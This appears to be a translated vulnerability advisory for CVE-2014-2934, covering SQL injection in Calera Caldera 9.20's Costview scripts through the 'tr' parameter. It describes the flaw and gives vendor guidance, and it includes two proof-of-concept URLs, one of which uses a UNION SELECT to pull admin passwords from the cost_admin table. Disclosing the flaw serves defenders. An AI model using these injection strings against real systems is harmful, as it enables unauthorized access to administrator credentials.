Multiple SQL Injection Vulnerabilities with the Caldera 'tr' Parameter

Release date:
Updated on: 2014-05-10

Affected Systems:
Calera Caldera 9.20
Description:
--------------------------------------------------------------------------------
Bugtraq id: 67256
CVE (CAN) ID: CVE-2014-2934
 
Caldera is a RIP software, color management software, and workflow software.
 
Multiple scripts of Caldera 9.20 and earlier versions have the SQL injection vulnerability. These vulnerabilities are caused by the application's failure to correctly delete certain elements in the SQL command. Attackers can exploit this vulnerability to perform unauthorized database operations.
 
<* Source: Thomas Fischer
Markus Wulftange

Link: http://www.kb.cert.org/vuls/id/693092
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
/Costview2/jobs. php? Tr = 0 + union + select + 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, pass_adm, 14,15, 16 + from + cost_admin
/Costview2/printers. php? Id_onglet = 0 & tr = 0 + union + select + distinct, null, null, 0, null & deb = 0

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Caldera
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://www.caldera.com/support/
 
Http://www.caldera.com/product/version-9-20/
Http://www.caldera.com/product/options/costview/

This article permanently updates the link address: